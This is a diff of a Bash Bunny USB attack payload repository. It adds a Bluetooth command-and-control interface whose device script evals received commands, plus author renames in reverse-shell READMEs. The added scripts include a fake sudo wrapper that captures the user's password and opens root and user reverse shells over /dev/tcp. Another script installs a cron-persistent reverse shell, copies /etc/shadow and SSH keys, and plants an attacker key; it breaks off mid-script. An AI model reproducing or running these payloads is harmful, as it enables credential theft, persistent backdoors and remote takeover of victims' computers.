<img src="static/bb_icon.png" style="height: 45px; padding-right: 15px;" class="d-inline-block"><span style="vertical-align: middle;">BlueBunny</span>
|
||||
</a>
|
||||
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
|
||||
<span class="navbar-toggler-icon"></span>
|
||||
</button>
|
||||
<div class="collapse navbar-collapse">
|
||||
<ul class="nav">
|
||||
<li class="nav-item">
|
||||
<a class="btn">Connect to Bash Bunny</a>
|
||||
</li>
|
||||
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
|
||||
<a>©</a>
|
||||
</li>
|
||||
</ul>
|
||||
</div>
|
||||
</div>
|
||||
</nav>
|
||||
</div>
|
||||
<br>
|
||||
<br>
|
||||
<div class="container" style="display: flex; flex-flow: wrap; justify-content: start;">
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">Payload One-Liner <p class="text-dark-emphasis" style="font-size: 15px;"><small>Run a single line of code</small></p></h4>
|
||||
<div class="form">
|
||||
<form action="" method="POST" hidden>
|
||||
<div class="input-group mb-3">
|
||||
<input type="text" class="form-control" placeholder="Q ALT F4" autocomplete="off" list="datalistOptions" name="query" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
|
||||
<datalist id="datalistOptions">
|
||||
<option value="Q STRING Hello World!"></option>
|
||||
<option value="Q CAPSLOCK"></option>
|
||||
<option value="Q ALT F4"></option>
|
||||
<option value="Q COMMAND q"></option>
|
||||
<option value="Q WIN r"></option>
|
||||
<option value="Q COMMAND SPACE"></option>
|
||||
</datalist>
|
||||
<input type="hidden" name="mode" value="cmd">
|
||||
<button class="btn" type="submit">Run</button>
|
||||
</div>
|
||||
</form>
|
||||
<h6 hidden>Not available</h6>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">Payload Script<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-info-circle-fill" viewBox="-5 5 19 19" style="overflow: visible; cursor: pointer;" onclick="info('info_payload')"><path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/><path d="m8.93 6.588-2.29.287-.082.38.45.083c.294.07.352.176.288.469l-.738 3.468c-.194.897.105 1.319.808 1.319.545 0 1.178-.252 1.465-.598l.088-.416c-.2.176-.492.246-.686.246-.275 0-.375-.193-.304-.533L8.93 6.588zM9 4.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0z"/></svg> <p class="text-dark-emphasis" style="font-size: 15px;"><small>Upload and execute a payload file</small></p></h4>
|
||||
<div class="form">
|
||||
<form hidden>
|
||||
<div class="input-group mb-3">
|
||||
<input type="file" accept=".txt" class="form-control" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" id="payloadFile">
|
||||
</div>
|
||||
<button class="btn" title="Execute Payload" onclick="execPayloadFile()">Execute Payload</button>
|
||||
</form>
|
||||
<form action="" method="POST" id="payloadForm">
|
||||
<input type="hidden" name="mode" value="cmd">
|
||||
<input type="hidden" name="query" value="" id="payloadContent">
|
||||
</form>
|
||||
<h6 hidden>Not available</h6>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">Attack Mode<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-info-circle-fill" viewBox="-5 5 19 19" style="overflow: visible; cursor: pointer;" onclick="info('info_attackmode')"><path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/><path d="m8.93 6.588-2.29.287-.082.38.45.083c.294.07.352.176.288.469l-.738 3.468c-.194.897.105 1.319.808 1.319.545 0 1.178-.252 1.465-.598l.088-.416c-.2.176-.492.246-.686.246-.275 0-.375-.193-.304-.533L8.93 6.588zM9 4.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0z"/></svg> <p class="text-dark-emphasis" style="font-size: 15px;"><small>Configure Ethernet, Storage, HID and Serial</small></p></h4>
|
||||
<div class="form">
|
||||
<form action="" method="POST" hidden>
|
||||
<div class="input-group">
|
||||
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
|
||||
<option value="ATTACKMODE OFF" selected>None</option>
|
||||
<option value="ATTACKMODE SERIAL">SERIAL</option>
|
||||
<option value="ATTACKMODE ECM_ETHERNET">ECM ETHERNET</option>
|
||||
<option value="ATTACKMODE RNDIS_ETHERNET">RNDIS ETHERNET</option>
|
||||
<option value="ATTACKMODE AUTO_ETHERNET">AUTO ETHERNET</option>
|
||||
<option value="ATTACKMODE STORAGE">STORAGE</option>
|
||||
<option value="ATTACKMODE HID">HID</option>
|
||||
</select>
|
||||
<input type="hidden" name="mode" value="cmd">
|
||||
<button class="btn" type="submit">Update</button>
|
||||
</div>
|
||||
</form>
|
||||
<h6 hidden>Not available</h6>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">LED <p class="text-dark-emphasis" style="font-size: 15px;"><small>Light up your Bush Bunny</small></p></h4>
|
||||
<div class="form">
|
||||
<form action="" method="POST" hidden>
|
||||
<div class="input-group">
|
||||
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
|
||||
<option value="LED G" selected>Green</option>
|
||||
<option value="LED B">Blue</option>
|
||||
<option value="LED R">Red</option>
|
||||
<option value="LED Y">Yellow</option>
|
||||
<option value="LED C">Cyan</option>
|
||||
<option value="LED M">Magenta</option>
|
||||
<option value="LED W">White</option>
|
||||
</select>
|
||||
<input type="hidden" name="mode" value="cmd">
|
||||
<button class="btn" type="submit">Update</button>
|
||||
</div>
|
||||
</form>
|
||||
<h6 hidden>Not available</h6>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">CPU Control <p class="text-dark-emphasis" style="font-size: 15px;"><small>Tune the CPU to your needs</small></p></h4>
|
||||
<div class="form">
|
||||
<form action="" method="POST" hidden>
|
||||
<div class="input-group">
|
||||
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
|
||||
<option value="CUCUMBER ENABLE">Single Core Ondemand (Low Power)</option>
|
||||
<option value="CUCUMBER DISABLE" selected>Quad Core Ondemand (Default)</option>
|
||||
<option value="CUCUMBER PLAID">Quad Core Performance (High Performance)</option>
|
||||
</select>
|
||||
<input type="hidden" name="mode" value="cmd">
|
||||
<button class="btn" type="submit">Update</button>
|
||||
</div>
|
||||
</form>
|
||||
<h6 hidden>Not available</h6>
|
||||
</div>
|
||||
</div>
|
||||
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
|
||||
<h4 style="color: #ced4da;">Power Management<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-info-circle-fill" viewBox="-5 5 19 19" style="overflow: visible; cursor: pointer;" onclick="info('info_power')"><path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/><path d="m8.93 6.588-2.29.287-.082.38.45.083c.294.07.352.176.288.469l-.738 3.468c-.194.897.105 1.319.808 1.319.545 0 1.178-.252 1.465-.598l.088-.416c-.2.176-.492.246-.686.246-.275 0-.375-.193-.304-.533L8.93 6.588zM9 4.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0z"/></svg> <p class="text-dark-emphasis" style="font-size: 15px;"><small>Take a break</small></p></h4>
|
||||
<div class="form">
|
||||
<form action="" method="POST" hidden>
|
||||
<div class="input-group">
|
||||
<select class="form-select" style="background-color: #202124; border-color: #EC1A24; color: #adb5bd;" name="query">
|
||||
<option value="shutdown -h now" selected>Shutdown</option>
|
||||
<option value="reboot">Reboot</option>
|
||||
</select>
|
||||
<input type="hidden" name="mode" value="cmd">
|
||||
<button class="btn btn-imp" type="submit">Initialize</button>
|
||||
</div>
|
||||
</form>
|
||||
<h6 hidden>Not available</h6>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div style="position: absolute; width: 100%; height: 100%;" id="info_payload" hidden>
|
||||
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
|
||||
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
|
||||
<div style="margin: 20px; width: 100%" id="action">
|
||||
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Payload Script</h3>
|
||||
<p>This section allows you to execute custom payload files.</p>
|
||||
<p>The name of the uploaded file doesn't have to match <code>payload.txt</code>.</p>
|
||||
<p>Uploaded payloads will be sent to your Bash Bunny and will be saved temporary. After finishing your payload, it gets removed automatically.
|
||||
<div class="text-center" style="margin-top: 100px;">
|
||||
<button class="btn" onclick="infoClose('info_payload')">Close</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div style="position: absolute; width: 100%; height: 100%;" id="info_attackmode" hidden>
|
||||
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
|
||||
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
|
||||
<div style="margin: 20px; width: 100%" id="action">
|
||||
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Attack Mode</h3>
|
||||
<p>This section allows you to change the Bash Bunny's attack mode like the <code>ATTACKMODE</code> payload command does.</p>
|
||||
<p>Further and more complex attack mode combinations can always be set from the "Payload One-Liner" or a payload file.</p>
|
||||
<p class="fw-bold">Important:</p>
|
||||
<p>When setting the attack mode, you likely can't change it without a reboot (besides disabling it again). The target machine may not recognize the change, for example, from STORAGE to HID. It may no longer detect the storage but won't be able to recognize the HID. Keep in mind: This can differ between target devices.</p>
|
||||
<div class="text-center" style="margin-top: 100px;">
|
||||
<button class="btn" onclick="infoClose('info_attackmode')">Close</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div style="position: absolute; width: 100%; height: 100%;" id="info_power" hidden>
|
||||
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
|
||||
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
|
||||
<div style="margin: 20px; width: 100%" id="action">
|
||||
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Power Management</h3>
|
||||
<p>This section allows you to shutdown or reboot your Bash Bunny.</p>
|
||||
<p>After reboot, your Bash Bunny will run the payload available at the current switch position.</p>
|
||||
<p>Rebooting may help when you encouter execution issues. When the attacked device won't recognize attack mode changes, rebooting and then setting the new attack mode will fix it.</p>
|
||||
<div class="text-center" style="margin-top: 100px;">
|
||||
<button class="btn" onclick="infoClose('info_power')">Close</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div style="position: absolute; width: 100%; height: 100%;" id="info_cp" hidden>
|
||||
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
|
||||
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
|
||||
<div style="margin: 20px; width: 100%" id="action">
|
||||
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Copyright & Attribution</h3>
|
||||
<br>
|
||||
<img src="static/logo.png" style="height: 45px; padding-right: 15px; padding-bottom: 5px;" class="d-inline-block">
|
||||
<p>BlueBunny is an open source project from <code><a href="https://github.com/90N45-d3v">90N45</a></code>.<br>It is licensed under the MIT license and should be treated as such.</p>
|
||||
<br>
|
||||
<img src="static/bb_icon_original.png" style="height: 45px; padding-right: 15px; padding-bottom: 5px;" class="d-inline-block">
|
||||
<p>Bash Bunny is a trademark of Hak5 LLC.<br>Visit <code><a href="https://hak5.org">hak5.org</a></code> for more.</p>
|
||||
<div class="text-center" style="margin-top: 100px;">
|
||||
<button class="btn" onclick="infoClose('info_cp')">Close</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
|
@ -0,0 +1,92 @@
|
|||
![BlueBunny-Banner](https://github.com/90N45-d3v/BlueBunny/assets/79598596/fae0b5ca-6b38-41b3-a5fc-7aa3cabea369)
|
||||
<p align="center">
|
||||
<img src="https://img.shields.io/badge/Made%20with-Python-blue">
|
||||
<img src="https://img.shields.io/github/license/90N45-d3v/BlueBunny.svg">
|
||||
<img src="https://img.shields.io/badge/Ask%20me-anything-1abc9c.svg">
|
||||
<br>
|
||||
<img src="https://img.shields.io/badge/-Linux-lightblue">
|
||||
</p>
|
||||
<p align="center">
|
||||
C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.<br>Send your Bash Bunny all the instructions it needs just over the air.
|
||||
</p>
|
||||
|
||||
* Author: 90N45
|
||||
* Version: 1.0
|
||||
* Category: Remote
|
||||
* Attackmodes: NONE (Custom)
|
||||
|
||||
## Table of contents
|
||||
- [Overview](https://github.com/90N45-d3v/BlueBunny#overview)
|
||||
- [Installation & Start](https://github.com/90N45-d3v/BlueBunny#installation--start)
|
||||
- [Manual communication with the Bash Bunny through Python](https://github.com/90N45-d3v/BlueBunny#manual-communication-with-the-bash-bunny-through-python)
|
||||
- [Troubleshooting](https://github.com/90N45-d3v/BlueBunny#troubleshooting)
|
||||
- [Working on...](https://github.com/90N45-d3v/BlueBunny#working-on)
|
||||
- [Additional information](https://github.com/90N45-d3v/BlueBunny#additional-information)
|
||||
|
||||
## Overview
|
||||
#### Structure
|
||||
![BlueBunny-Structure](https://github.com/90N45-d3v/BlueBunny/assets/79598596/3004fb10-feef-45c8-8624-1393c2fb7288)
|
||||
|
||||
|
||||
## Installation & Start
|
||||
1. Install required dependencies
|
||||
````
|
||||
pip install pygatt "pygatt[GATTTOOL]"
|
||||
````
|
||||
Make sure [BlueZ](http://www.bluez.org/download/) is installed and `gatttool` is usable
|
||||
````
|
||||
sudo apt install bluez
|
||||
````
|
||||
2. Download the `BlueBunny` folder and switch into the `BlueBunny/C2` folder
|
||||
````
|
||||
cd BlueBunny/C2
|
||||
````
|
||||
3. Start the C2 server
|
||||
````
|
||||
sudo python c2-server.py
|
||||
````
|
||||
4. Plug your Bash Bunny with the BlueBunny payload into the target machine (payload at: `BlueBunny/payload.txt`).
|
||||
5. Visit your C2 server from your browser on `localhost:1472` and connect your Bash Bunny (Your Bash Bunny will light up green when it's ready to pair).
|
||||
|
||||
|
||||
## Manual communication with the Bash Bunny through Python
|
||||
You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.
|
||||
#### Example Code
|
||||
````python
|
||||
# Import the backend (BlueBunny/C2/BunnyLE.py)
|
||||
import BunnyLE
|
||||
|
||||
# Define the data to send
|
||||
data = "QUACK STRING I love my Bash Bunny"
|
||||
# Define the type of the data to send ("cmd" or "payload") (payload data will be temporary written to a file, to execute multiple commands like in a payload script file)
|
||||
d_type = "cmd"
|
||||
|
||||
# Initialize BunnyLE
|
||||
BunnyLE.init()
|
||||
|
||||
# Connect to your Bash Bunny
|
||||
bb = BunnyLE.connect()
|
||||
|
||||
# Send the data and let it execute
|
||||
BunnyLE.send(bb, data, d_type)
|
||||
````
|
||||
|
||||
## Troubleshooting
|
||||
#### Connecting your Bash Bunny doesn't work? Try the following instructions:
|
||||
- Try connecting a few more times
|
||||
- Check if your bluetooth adapter is available
|
||||
- Restart the system your C2 server is running on
|
||||
- Check if your Bash Bunny is running the BlueBunny payload properly
|
||||
- How far away from your Bash Bunny are you? Is the environment (distance, interferences etc.) still sustainable for typical BLE connections?
|
||||
#### Bugs within BlueZ
|
||||
The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kind of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised and calm down if they show up.
|
||||
- Timeout after 5.0 seconds
|
||||
- Unknown error while scanning for BLE devices
|
||||
|
||||
## Working on...
|
||||
- Remote shell access
|
||||
- BLE exfiltration channel
|
||||
- Improved connecting process
|
||||
|
||||
## Additional information
|
||||
As I said, BlueZ, the base for the bluetooth part used in BlueBunny, is somewhat bug prone. If you encounter any non-temporary bugs when connecting to Bash Bunny as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution or just a nice feedback.
|
|
@ -0,0 +1,63 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: BlueBunny
|
||||
# Description: BLE based C2 server for the Bash Bunny Mark II
|
||||
# Author: 90N45
|
||||
# Version: 1.0
|
||||
# Category: Remote
|
||||
# Attackmodes: NONE (Custom)
|
||||
|
||||
LED SETUP
|
||||
|
||||
# Enable serial BLE module
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
|
||||
sleep 1
|
||||
|
||||
# Configure BLE module as slave
|
||||
echo -n -e "AT+ROLE=0" > /dev/ttyS1
|
||||
echo -n -e "AT+NAME=BlueBunny" > /dev/ttyS1
|
||||
echo -n -e "AT+ADV=1" > /dev/ttyS1
|
||||
echo -n -e "AT+RESET" > /dev/ttyS1
|
||||
|
||||
LED FINISH
|
||||
|
||||
while [[ true ]]; do
|
||||
# Get incomming data from serial port
|
||||
data=$(head -1 /dev/ttyS1)
|
||||
|
||||
# Decode base64 encoded data
|
||||
data=$(echo ${data} | base64 -d)
|
||||
|
||||
# Echo data for debugging
|
||||
echo "Debugger: ${data}"
|
||||
|
||||
# Single command
|
||||
if [[ $data =~ "<CMD>" ]]; then
|
||||
# Extract command
|
||||
command=${data#*<CMD>}
|
||||
command=${command%%<CMD>*}
|
||||
|
||||
# Run recieved command
|
||||
eval "${command}"
|
||||
fi
|
||||
|
||||
# Payload file
|
||||
if [[ $data =~ "<PAYLOAD>" ]]; then
|
||||
# Set payload file name
|
||||
file="BlueBunnyPayload-${RANDOM}.txt"
|
||||
|
||||
# Extract file content
|
||||
content=${data#*<PAYLOAD>}
|
||||
content=${content%%<PAYLOAD>*}
|
||||
|
||||
# Write content to file
|
||||
printf "${content}" > "${file}";
|
||||
|
||||
# Run payload
|
||||
bash $file
|
||||
|
||||
# Remove payload file
|
||||
rm $file
|
||||
fi
|
||||
done
|
|
@ -15,7 +15,7 @@
|
|||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||
#
|
||||
# Modified by 0iphor13 for PingZhellBunny
|
||||
# Modified by 0i41E for PingZhellBunny
|
||||
#
|
||||
#
|
||||
#
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: PingZhellBunny**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.5<br>
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: PingZhellBunny
|
||||
# Description: Getting remote access via ICMP
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.5
|
||||
# Category: Remote_Access
|
||||
# Attackmodes: HID, RNDIS_ETHERNET
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: ReverseBunny**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.5<br>
|
||||
|
||||
|
@ -8,7 +8,7 @@ Version: 1.5<br>
|
|||
<p>!Getting remote access via obfuscated reverse shell!<br>
|
||||
Upload payload.txt and RevBunny.ps1 onto your Bunny
|
||||
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png)
|
||||
|
||||
Change the variables in payload.txt to your attacking machine & start your listener. (for example netcat: nc -lvnp [PORT] )</p>
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: ReverseBunny
|
||||
# Description: Get remote access, using an obfuscated powershell reverse shell.
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.5
|
||||
# Category: Remote_Access
|
||||
# Attackmodes: HID, RNDIS_ETHERNET
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
**Title: ReverseBunnySSL**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
<p>Author: 0i41E<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.2<br>
|
||||
For input and inspiration - Thanks to: Cribbit, sebkinne</p>
|
||||
|
@ -26,5 +26,5 @@ I recommend openssl itself or ncat - Example syntax for both:<br>
|
|||
|
||||
**Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell**
|
||||
|
||||
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
|
||||
![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)
|
||||
![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
#
|
||||
# Title: ReverseBunnySSL
|
||||
# Description: Get remote access, using an obfuscated powershell reverse shell.
|
||||
# Author: 0iphor13
|
||||
# Author: 0i41E
|
||||
# Version: 1.2
|
||||
# Category: Remote_Access
|
||||
# Attackmodes: HID, RNDIS_ETHERNET
|
||||
|
|
|
@ -0,0 +1,15 @@
|
|||
# Root_Reverse_Shell_linux_mac
|
||||
|
||||
### Since i dont have a bash bunny this is tested in digispark
|
||||
### I have converted this script to bash bunny
|
||||
### If any issues put in discussion i will fix it
|
||||
POC DIGISPARK LINK : https://drive.google.com/open?id=1DvKX8QXHImVRZMaoTvmtreFkiL4rwYF-
|
||||
### Special thanks to sudobackdoor for bash script sample
|
||||
Dont forget to change IP in payload.sh.<br/>
|
||||
Before using this payload don't forget to start netcat listeners on port 4444 and 1337.<br/>
|
||||
It reverse connects user shell in port 4444 and root shell in port 1337.<br/>
|
||||
Make sure switch is in position 1.<br/>
|
||||
|
||||
Once the payload.sh is executed the sudobackdoor script it will gets the root credential and It will be used for getting higher privileges and gives a reverse root netcat connection. Additionaly i have added a user level netcat connection also.
|
||||
|
||||
The reason for two netcat connection is user level connection established when script is executed. But to obtain root credential is required, So it waits for user to elevate his privileges to root. So initialy i have given a normal connection then after sudo execution root connection will be established.
|
|
@ -0,0 +1,59 @@
|
|||
#!/bin/bash
|
||||
|
||||
LISTENER_IP="127.0.0.1"
|
||||
LISTENER1_PORT="1337" #Listener for root shell
|
||||
LISTENER2_PORT="4444" #Listener for user shell
|
||||
|
||||
if [ ! -d ~/.config/sudo ]
|
||||
then
|
||||
mkdir -p ~/.config/sudo
|
||||
fi
|
||||
|
||||
if [ -f ~/.config/sudo/sudo ]
|
||||
then
|
||||
rm ~/.config/sudo/sudo
|
||||
fi
|
||||
|
||||
|
||||
echo '#!'$SHELL >> ~/.config/sudo/sudo
|
||||
cat <<'EOF' >> ~/.config/sudo/sudo
|
||||
/usr/bin/sudo -n true 2>/dev/null
|
||||
if [ $? -eq 0 ]
|
||||
then
|
||||
/usr/bin/sudo $@
|
||||
else
|
||||
echo -n "[sudo] password for $USER: "
|
||||
read -s pwd
|
||||
echo
|
||||
echo "$pwd" | /usr/bin/sudo -S true 2>/dev/null
|
||||
if [ $? -eq 1 ]
|
||||
then
|
||||
echo "Sorry, try again."
|
||||
sudo $@
|
||||
else
|
||||
/usr/bin/sudo -S $@
|
||||
if [ -f ~/.bash_profile ]
|
||||
then
|
||||
rm ~/.bash_profile
|
||||
mv ~/.bash_profile.bak ~/.bash_profile
|
||||
else
|
||||
rm ~/.bashrc
|
||||
mv ~/.bashrc.bak ~/.bashrc
|
||||
fi
|
||||
rm ~/.config/sudo/sudo
|
||||
echo "$pwd" | sudo -S disown !$ $(sudo /bin/bash -i > /dev/tcp/$LISTENER_IP/$LISTENER1_PORT 0<&1 2>&1) &
|
||||
fi
|
||||
fi
|
||||
EOF
|
||||
|
||||
chmod u+x ~/.config/sudo/sudo
|
||||
if [ -f ~/.bash_profile ]
|
||||
then
|
||||
cp ~/.bash_profile ~/.bash_profile.bak
|
||||
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile
|
||||
else
|
||||
cp ~/.bashrc ~/.bashrc.bak
|
||||
echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
|
||||
fi
|
||||
disown !$ $(/bin/bash -i > /dev/tcp/$LISTENER_IP/$LISTENER2_PORT 0<&1 2>&1) &
|
||||
bash
|
|
@ -0,0 +1,50 @@
|
|||
# Title: Linux/Mac Reverse Shell
|
||||
# Author: Darkprince (Sridhar)
|
||||
# Version: 1.0
|
||||
#
|
||||
# Runs a script in the background that provides a user shell initially and waits for the user to escalate privileges, then provides a root reverse shell.
|
||||
|
||||
# Magenta..................Setup
|
||||
# Red, Green, Blue.........Executing
|
||||
# Green....................Finished
|
||||
|
||||
# INITIALIZING
|
||||
LED W
|
||||
|
||||
# Mac keyboard works in Linux and Mac
|
||||
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
|
||||
|
||||
LANGUAGE='us'
|
||||
|
||||
# Ensure the switch position is 1
|
||||
# Delay for HID device recognition
|
||||
Q DELAY 1000
|
||||
|
||||
# ATTACKING
|
||||
LED R G B
|
||||
|
||||
# Get Linux/Mac Terminal
|
||||
RUN UNITY xterm
|
||||
Q DELAY 1000
|
||||
# To close the opened window by the Linux run command
|
||||
Q GUI Q
|
||||
Q CTRL C
|
||||
RUN OSX terminal
|
||||
Q DELAY 1000
|
||||
|
||||
# If Linux, then clearing 'terminal' which is typed by Mac run script
|
||||
Q CTRL C
|
||||
|
||||
# Execute bash script which is the same for Mac and Linux
|
||||
GET SWITCH_POSITION
|
||||
Q STRING bash /Volumes/BashBunny/payloads/$SWITCH_POSITION/payload.sh
|
||||
|
||||
# The cleanup process will be handled by the bash script
|
||||
# Closing the xterm in Linux
|
||||
# Closing the terminal in Mac, even if the terminal has other processes COMMAND Q and ENTER keys will terminate the terminal
|
||||
Q GUI Q
|
||||
Q CTRL C
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
|
||||
LED G
|
|
@ -0,0 +1,48 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Main Payload
|
||||
|
||||
# Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc..
|
||||
RSA_KEY='PLACEHOLDER-FOR-RSA-PUBLIC-KEY' # replace with the contents of ~/.ssh/id_rsa.pub or whatever your RSA public key file is named
|
||||
REVERSESHELL=true
|
||||
LHOST='10.20.20.104' # Reverse Shell listening host IP
|
||||
LPORT='4444' # Reverse Shell listening host port
|
||||
CRON='30 */1 * * *' # Just the timing portion of the CRON job
|
||||
ATTACKER_HOST='engineering@kali-2' # Tail end of RSA key from above. Do not include spaces
|
||||
DT=$(date "+%Y.%m.%d-%H.%M.%S")
|
||||
DN=/media/$USER/BashBunny/loot/$USER-$HOSTNAME-$DT
|
||||
|
||||
if [ "$REVERSESHELL" = true ] ; then
|
||||
# Create reverse shell script
|
||||
echo "#!/bin/bash"> .config/rs.sh ;
|
||||
echo "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1">> .config/rs.sh ;
|
||||
chmod +x /home/$USER/.config/rs.sh ;
|
||||
|
||||
# Add task to CRON that launches the Reverse_TCP script on a schedule for persistence
|
||||
crontab -l > crontab.tmp ;
|
||||
if grep -Fq .config/rs.sh crontab.tmp; then
|
||||
echo 'Update in progress.'
|
||||
else
|
||||
echo "$CRON /home/$USER/.config/rs.sh" >> crontab.tmp ;
|
||||
crontab crontab.tmp ;
|
||||
fi
|
||||
rm -f crontab.tmp ;
|
||||
fi
|
||||
|
||||
# Smash & Grab the loot!! (Get what you can now and work on PrivEsc later)
|
||||
mkdir $DN ;
|
||||
ip addr > $DN/ip-addr.txt ;
|
||||
whoami > $DN/whoami.txt ;
|
||||
cat /proc/net/arp > $DN/arp.txt ;
|
||||
cat /etc/passwd > $DN/etc-passwd.txt ;
|
||||
cat /etc/shadow > $DN/etc-shadow.txt ;
|
||||
uname -a > $DN/uname-a.txt ;
|
||||
route -n > $DN/route-n.txt ;
|
||||
cp /home/$USER/.ssh/* $DN/. ;
|
||||
|
||||
# Add Attacker's RSA key to .ssh/authorized_keys for additional persistence
|
||||
if grep -Fq $ATTACKER_HOST .ssh/authorized_keys ; then
|
||||
echo 'Update almost completed.'
|
||||
else
|
||||
